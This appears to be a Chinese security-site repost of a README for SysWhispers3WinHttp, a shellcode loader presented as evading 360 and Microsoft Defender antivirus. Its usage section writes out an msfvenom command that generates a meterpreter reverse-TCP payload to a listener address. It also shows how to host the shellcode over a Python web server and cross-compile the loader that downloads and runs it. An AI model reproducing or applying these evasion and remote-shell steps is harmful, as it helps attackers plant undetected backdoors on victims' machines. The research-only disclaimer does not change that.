SysWhispers3WinHttp
SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。
0x00 免责声明:
该项目仅供安全研究使用,禁止使用该项目进行违法操作,否则由使用者承担全部法律及连带责任。
0x01 更新日志:
2023/06/06 支持64位GCC编译且可通过Stager方式上线SliverC2,增添编译参数绕过静态检测。
0x02 使用:
// 1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=
192.168
.
1.110
lport=
4444
-f raw -o beacon.bin
// 2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)
python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译
x86_64-w64-mingw32-gcc -o
SysWhispers3WinHttp
.exe syscalls64.
c
SysWhispers3WinHttp
.
c
-masm=intel -w -s -lwinhttp -
O1
// ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o
SysWhispers3WinHttp
.exe syscalls.
c
SysWhispers3WinHttp
.
c
-masm=intel -w -s -lwinhttp -
O1
0x03 演示:
360核晶(2023/06/06更新)
Defender(2023/06/06更新)
微步云沙箱
0x04 参考:
https://github.com/klezVirus/SysWhispers3
https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect
0x05 项目地址:
https://github.com/huaigu4ng/SysWhispers3WinHttp
项目作者:huaigu4ng
原文始发于微信公众号(Ots安全):【免杀系列】SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶等
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论